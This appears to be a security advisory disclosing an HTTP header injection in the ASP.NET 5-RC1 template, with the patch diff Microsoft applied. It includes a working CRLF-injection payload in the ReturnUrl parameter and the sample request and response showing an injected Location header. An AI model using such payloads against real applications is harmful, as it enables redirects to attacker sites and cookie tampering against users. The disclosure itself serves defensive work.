ASP.NET Core is a open-source and cross-platform framework for building modern cloud based internet connected applications, such as web apps, IoT apps and mobile backends. ASP.NET Core apps can run on .NET Core or on the full .NET Framework. It was architected to provide an optimized development framework for apps that are deployed to the cloud or run on-premises. [1]
The ASP.NET 5-RC1 Web Application Template is vulnerable to a HTTP Header Injection. Control characters are not filtered in the URL. This allows to send a carriage return character (%0D and %0A) in the ReturnUrl parameter. The content after the carriage return character is injected into the HTTP Response Header.
As a proof of concept, we show how this HTTP header injection can be used to redirect the victim from the destination website azurewebsites.net to www.csnc.ch. We use the string “/Account/\r\nLocation: http://www.csnc.ch” as “ReturnUrl” parameter:
POST /Account/Login?ReturnUrl=%2FAccount%0D%0ALocation%3A%20http%3A%2F%2Fwww.csnc.ch HTTP/1.1 Host: [CUT BY COMPASS].azurewebsites.net Cookie: [CUT BY COMPASS] Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 240 Username=[VALID USERNAME]&Password=[VALID PASSWORD]&__RequestVerificationToken=[CUT BY COMPASS]
The server generates the following response, with the parameter from the GET requested inserted into the HTTP response headers. In this case a manipulated redirection location (“Location: http://www.csnc.ch”):
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 0 Expires: -1 Location: http://www.csnc.ch Server: Microsoft-IIS/8.0 Set-Cookie: .AspNet.Microsoft.AspNet.Identity.Application=[CUT BY COMPASS]; path=/; secure; httponly X-Powered-By: ASP.NET Date: Tue, 12 Apr 2016 13:50:23 GMT Connection: close
With the same attack, also other HTTP Header values can be manipulated, e.g. it’s possible to set new cookies, or to overwrite existing cookies.
Microsoft patched the software since the version 1.0.0-RC2 of ASP.NET Core. Their bugfix consists of refusing parameters with control characters (ASCII values smaller than 0x20).
Github source code change:
https://github.com/aspnet/KestrelHttpServer/commit/c1e5640a656ddfe6d478cb54a30002de41c25180
New character check in the code:
+ public static void ValidateHeaderCharacters(string headerCharacters)
+ {
+ if (headerCharacters != null)
+ {
+ foreach (var ch in headerCharacters)
+ {
+ if (ch < 0x20)
+ {
+ throw new InvalidOperationException(string.Format("Invalid control character in header: 0x{0:X2}", (byte)ch));
+ }
+ }
+ }
+ }
The Compass advisory is available via here
Microsoft paid 5000$ based on their bug bounty program for Microsoft .NET Core: https://technet.microsoft.com/en-us/library/dn425036.aspx
Congrats, very nice finding :)